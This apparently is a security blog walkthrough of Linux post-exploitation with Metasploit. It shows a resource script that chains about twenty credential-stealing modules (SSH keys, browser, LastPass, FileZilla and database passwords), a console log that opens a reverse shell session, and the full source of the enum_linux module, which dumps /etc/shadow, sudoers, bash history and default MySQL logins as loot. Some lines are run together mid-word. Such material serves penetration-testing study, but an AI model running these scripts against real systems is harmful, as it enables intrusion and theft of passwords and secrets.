If a security researcher, you may want to gather system/applications/services/processes/files/network/… information from the vulnerable lab with Metasploit Framework. Please read Basic Linux Privilege Escalation.
In order to solve the time, a resource script called enum_linux.rc is created.
enum_linux.rc
run post/linux/gather/enum_configs
run post/linux/gather/enum_protections
run post/linux/gather/enum_system
run post/linux/gather/enum_xchat
run post/linux/gather/enum_network
run post/linux/gather/enum_psk
run post/linux/gather/enum_users_history
run credcollect
run post/multi/gather/dbvis_enum
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/wlan_geolocate
run post/multi/gather/thunderbird_creds
run post/multi/gather/ssh_creds
run post/multi/gather/remmina_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/pgpass_creds
run post/multi/gather/lastpass_creds
run post/multi/gather/firefox_creds
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmxmeterpreter > resource /path/to/enum_linux.rcpost/linux/gather/enum_linux
Another script post/linux/gather/enum_linux can be added to scan available information.
msf > resource /opt/enum_linux_listener.rc
[*] Processing /opt/enum_linux_listener.rc for ERB directives.
resource (/opt/enum_linux_listener.rc)> use exploit/multi/handler
resource (/opt/enum_linux_listener.rc)> set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
resource (/opt/enum_linux_listener.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/opt/enum_linux_listener.rc)> run
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.0.114:4444 -> 192.168.0.107:52336) at 2016-10-14 05:29:43 -0500
^Z
Background session 1? [y/N] y
msf exploit(handler) > use post/linux/gather/enum_linux
msf post(enum_linux) > show options
Module options (post/linux/gather/enum_linux):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf post(enum_linux) > set SESSION 1
SESSION => 1
msf post(enum_linux) > run
[+] Operating Syetem:
[+] Kali GNU/Linux Rolling
[+] Linux sh 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux
[*] Linux Information stored in /root/.msf4/loot/20161014053028_default_192.168.0.107_linux.enum.syste_101397.txt
[*] Post module execution completedcode - post/linux/gather/enum_linux.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::System
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Gather System Information',
'Description' => %q{
This module gathers system information. We collect
installed packages, installed services, mount information,
user list, user bash history and cron jobs, files, and so on.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nixawk'
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
))
end
def run
distro = get_sysinfo
store_loot(
"linux.version",
"text/plain",
session,
"Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}",
"linux_info.txt",
"Linux Version")
# Operating Syetem
print_good("Operating Syetem:")
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
# Application & Services
installed_pkg = get_packages(distro[:distro])
installed_svc = get_services(distro[:distro])
# File Systems / no (cat_file / read_file)
commands = [
## system
"/bin/hostname 2>/dev/null",
"/bin/uname -a 2>/dev/null",
"/bin/cat /etc/*-release 2>/dev/null",
# Communications & Networking
"/sbin/ifconfig -a 2>/dev/null",
"/bin/netstat -antp 2>/dev/null",
"/bin/netstat -anup 2>/dev/null",
"/bin/cat /etc/resolv.conf 2>/dev/null",
"/sbin/route -e",
"/sbin/iptables -L",
"/sbin/iptables -L -t nat",
"/sbin/iptables -L -t mangle",
"/bin/cat /etc/hosts",
"/usr/bin/lsof -nPi",
"/sbin/iwconfig",
"/bin/ls -R /etc/network",
"/sbin/route 2>/dev/null",
"/bin/cat /etc/inetd.conf 2>/dev/null",
"/bin/cat /etc/xinetd.conf 2>/dev/null",
"/bin/ls -la /etc/init.d 2>/dev/null",
# Confidential Information & Users
"/usr/bin/id 2>/dev/null",
"/usr/bin/lastlog | /bin/grep -v \"Never\" 2>/dev/null",
"/bin/cat /etc/passwd 2>/dev/null",
"/bin/cat /etc/shadow 2>/dev/null",
"/bin/cat /etc/master.passwd 2>/dev/null",
"/bin/cat /etc/sudoers 2>/dev/null",
"sudo -V 2>/dev/null",
"echo '' | sudo -S -l 2>/dev/null",
# /* Processes */
"ps aux 2>/dev/null",
# /* USER/GROUP */
"/usr/bin/whoami 2>/dev/null",
## FILES AND DIRECTORIES
"/bin/ls -ahl /root/ 2>/dev/null",
"/bin/ls -ahl /home/ 2>/dev/null",
"/bin/ls -ahl /etc/ 2>/dev/null",
"/bin/ls -ahl /opt/ 2>/dev/null",
"/bin/ls -ahl /var/ 2>/dev/null",
"/bin/ls -ahl /tmp/ 2>/dev/null",
"/bin/ls -ahl $HOME 2>/dev/null",
"/bin/cat /etc/ssh/sshd_config 2>/dev/null",
# /* ENVIRONMENTAL */
"/bin/cat /etc/issue 2>/dev/null",
"/bin/echo $PATH 2>/dev/null",
"/bin/cat /etc/shells 2>/dev/null",
"umask -S 2>/dev/null & umask 2>/dev/null",
"/bin/cat /etc/login.defs 2>/dev/null",
"/bin/cat ~/.bash_history 2>/dev/null",
"/bin/cat /root/.bash_history 2>/dev/null",
"/usr/bin/env 2>/dev/null",
"/bin/ls -la /var/log/ 2>/dev/null",
"/bin/cat /etc/shells 2>/dev/null",
"/bin/cat /etc/login.defs 2>/dev/null",
# /* JOBS/TASKS */
"/bin/ls -la /etc/cron* 2>/dev/null",
"/bin/cat /etc/crontab 2>/dev/null",
"/bin/ls -la /var/spool/cron/crontabs 2>/dev/null",
"/bin/ls -la /etc/anacrontab 2>/dev/null; /bin/cat /etc/anacrontab 2>/dev/null",
"/bin/ls -la /var/spool/anacron 2>/dev/null",
# /* SOFTWARE */
"mysql --version 2>/dev/null",
"mysqladmin -uroot -proot version 2>/dev/null",
"mysqladmin -uroot version 2>/dev/null",
"psql -V 2>/dev/null",
"redis-cli --vrsion 2>/dev/null",
"mongo --vrsion 2>/dev/null",
"apache2 -v 2>/dev/null; httpd -v 2>/dev/null",
"/bin/cat /etc/apache2/envvars 2>/dev/null",
# /* INTERESTING FILES */
"/bin/mount -l",
"/bin/df -ahT",
"find /var/log -type f -perm -4 2> /dev/null",
"find / -xdev -type f -perm +6000 -perm -1 2> /dev/null"
]
commands.each do |command|
result = ''
output = execute(command)
data = "enum-linux $ #{command}\n" + output
result << data if output
save(command, result) if result
end
save("Installed Packages", installed_pkg)
save("Installed Services", installed_svc)
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
output
end
def save(msg, data, ctype = 'text/plain')
ltype = "linux.enum.system"
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot}")
end
def get_packages(distro)
packages_installed = ""
case distro
when /fedora|redhat|suse|mandrake|oracle|amazon/
packages_installed = execute("rpm -qa")
when /slackware/
packages_installed = execute("/bin/ls /var/log/packages")
when /ubuntu|debian/
packages_installed = execute("/usr/bin/dpkg -l")
when /gentoo/
packages_installed = execute("equery list")
when /arch/
packages_installed = execute("/usr/bin/pacman -Q")
else
print_error("Could not determine package manager to get list of installed packages")
end
packages_installed
end
def get_services(distro)
services_installed = ""
case distro
when /fedora|redhat|suse|mandrake|oracle|amazon/
services_installed = execute("/sbin/chkconfig --list")
when /slackware/
services_installed << "\nEnabled:\n*************************\n"
services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'")
services_installed << "\n\nDisabled:\n*************************\n"
services_installed << execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'")
when /ubuntu|debian/
services_installed = execute("/usr/sbin/service --status-all")
when /gentoo/
services_installed = execute("/bin/rc-status --all")
when /arch/
services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf")
else
print_error("Could not determine the Linux Distribution to get list of configured services")
end
services_installed
end
end
